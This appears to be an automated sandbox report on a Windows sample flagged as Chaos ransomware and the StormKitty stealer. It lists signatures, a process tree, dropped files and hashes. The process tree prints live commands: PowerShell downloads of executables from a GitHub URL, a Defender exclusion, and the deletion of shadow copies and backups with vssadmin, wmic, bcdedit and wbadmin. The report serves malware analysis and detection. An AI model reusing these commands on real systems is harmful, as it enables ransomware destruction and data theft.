Analysis

  • max time kernel
    93s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22/03/2025, 05:53

General

  • Target
    ZGZ3X_nig.exe
  • Size
    57KB
  • MD5
    16edd47bf01716b24958a0b3a3a7bcfb
  • SHA1
    8b7972f4190c2ca9d600084611e966fa0f899b98
  • SHA256
    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
  • SHA512
    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
  • SSDEEP
    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
    "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2348
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:1872
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3792
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2024
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2828
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4292
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:624
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3124
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1680
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:3528
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled no
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:1308
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3900
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete catalog -quiet
                6⤵
                • Deletes backup catalog
                PID:3448
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
              5⤵
              • Opens file in notepad (likely ransom note)
              PID:1728
        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
          "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:3412
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:4400
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3716
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4944
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4260
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 2472
            4⤵
            • Program crash
            PID:232
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4004
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2844
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4700
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3412 -ip 3412
    1⤵
    PID:3804
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1476
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:796
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:116
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:4904

Downloads

  • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log
    Filesize: 1B
    MD5: d1457b72c3fb323a2671125aef3eab5d
    SHA1: 5bab61eb53176449e25c2c82f172b82cb13ffb9d
    SHA256: 8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
    SHA512: ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log
    Filesize: 226B
    MD5: 28d7fcc2b910da5e67ebb99451a5f598
    SHA1: a5bf77a53eda1208f4f37d09d82da0b9915a6747
    SHA256: 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
    SHA512: 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: d85ba6ff808d9e5444a4b369f5bc2730
    SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
    SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
    SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: ada23d35e4a3f1bc35ac8d393cd02675
    SHA1: 88dd6ddecec82aeafba2b6368078c7c70b88fcac
    SHA256: 98d17949831dda7243aa8b24a66443eee75d0805996826290fbe1a75bfc79e72
    SHA512: 0acae33f83787122b779b8b1b41580f4595eb44c74ef0035949e3d90103fd22e15ed4af4238985bd58f8a0378dc8bce4d77549ca4bb661c2c515018be99a79e6
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 6167e0b3b1bfe7811333fb0ff4260abb
    SHA1: 3ff0163e7819457a077316365ddbf19d8b4ea8f7
    SHA256: 7550ba7b917b7671dcb9783f7acb31854880f1fa845d7496ad27e013d70f4364
    SHA512: d0bc4f05c0eea70d441eef08f77495a1aea546c679c99e75eec34d1d5dc6c2ae2ddc7f1fadae515a74e8d8e90d493ab68c5ea24f33878491250ebd994cd061a5
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 43b0b5c58203d453fd8d31d936d5e6df
    SHA1: 9e4b7869c15801e1a86c1319919523fe4bd6c841
    SHA256: df3e0f7f7ef55cb398b3c25cdc9d0aa5a2868b5ab528d121b4e0146c1fb4b6fb
    SHA512: 816ebd495eea2f729d79f49b14e7698d32bc563d6569098acc45f0d12e8f8cf10abd2cfdd28a98e7a2798f05dac10d58d04ab89c269598b5a8181feb8fe8ee83
  • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt
    Filesize: 81B
    MD5: ea511fc534efd031f852fcf490b76104
    SHA1: 573e5fa397bc953df5422abbeb1a52bf94f7cf00
    SHA256: e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
    SHA512: f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae
  • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt
    Filesize: 1KB
    MD5: 062e358575f650b17d5537a547dba62d
    SHA1: b396fb8e5fad0bd3c0e25bcdc511c02c8048f125
    SHA256: 62457dcf70b8b1c72574ed4acfa8041830554bb005f72564efa8b4d7e5815b02
    SHA512: 87e74e1d92767823acdb228241ec4081a168de0d9f48472b6a38eee08891e5fb1d629544c9720290bb8cc64b637aa5b3108ee738c291c4f6c6905686358f3e0e
  • C:\Users\Admin\AppData\Local\Temp\610C.tmp\610D.tmp\610E.bat
    Filesize: 2KB
    MD5: 1c935ef28fdfd394b770d945d7f04d76
    SHA1: 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
    SHA256: aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
    SHA512: a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55yv0lv5.2wm.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\build.exe
    Filesize: 137KB
    MD5: 7605fb5c749eeea0b1b27fdaad78051c
    SHA1: 28388bf016af085bbcbacf8c516853942f6ec8d3
    SHA256: 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
    SHA512: 1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54
  • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
    Filesize: 211KB
    MD5: b6054dbe4ed853c2e35291f045a632ba
    SHA1: 1355fbe1ea1f6bb566921f04512f78590c4b0e41
    SHA256: b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
    SHA512: 648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0
  • C:\Users\Admin\readme.txt
    Filesize: 780B
    MD5: 60d646f40556d78166ad8111d850fc51
    SHA1: babaaf0762000dbf4b3f7a93beb35b6d9279d94d
    SHA256: a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
    SHA512: 3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6
  • memory/1868-0-0x0000000140000000-0x0000000140028000-memory.dmp
    Filesize: 160KB
  • memory/1868-42-0x0000000140000000-0x0000000140028000-memory.dmp
    Filesize: 160KB
  • memory/1868-65-0x0000000140000000-0x0000000140028000-memory.dmp
    Filesize: 160KB
  • memory/2024-49-0x00000000008E0000-0x0000000000908000-memory.dmp
    Filesize: 160KB
  • memory/2576-18-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp
    Filesize: 10.8MB
  • memory/2576-15-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp
    Filesize: 10.8MB
  • memory/2576-14-0x00007FFBBC540000-0x00007FFBBD001000-memory.dmp
    Filesize: 10.8MB
  • memory/2576-9-0x0000024704A60000-0x0000024704A82000-memory.dmp
    Filesize: 136KB
  • memory/2576-3-0x00007FFBBC543000-0x00007FFBBC545000-memory.dmp
    Filesize: 8KB
  • memory/3412-64-0x00000000048E0000-0x00000000048F2000-memory.dmp
    Filesize: 72KB
  • memory/3412-66-0x0000000004AD0000-0x0000000004C92000-memory.dmp
    Filesize: 1.8MB
  • memory/3412-67-0x0000000005A50000-0x0000000005F7C000-memory.dmp
    Filesize: 5.2MB
  • memory/3412-68-0x0000000006400000-0x0000000006466000-memory.dmp
    Filesize: 408KB
  • memory/3412-69-0x0000000006610000-0x00000000066A2000-memory.dmp
    Filesize: 584KB
  • memory/3412-120-0x00000000070C0000-0x0000000007664000-memory.dmp
    Filesize: 5.6MB
  • memory/3412-62-0x00000000000D0000-0x000000000010C000-memory.dmp
    Filesize: 240KB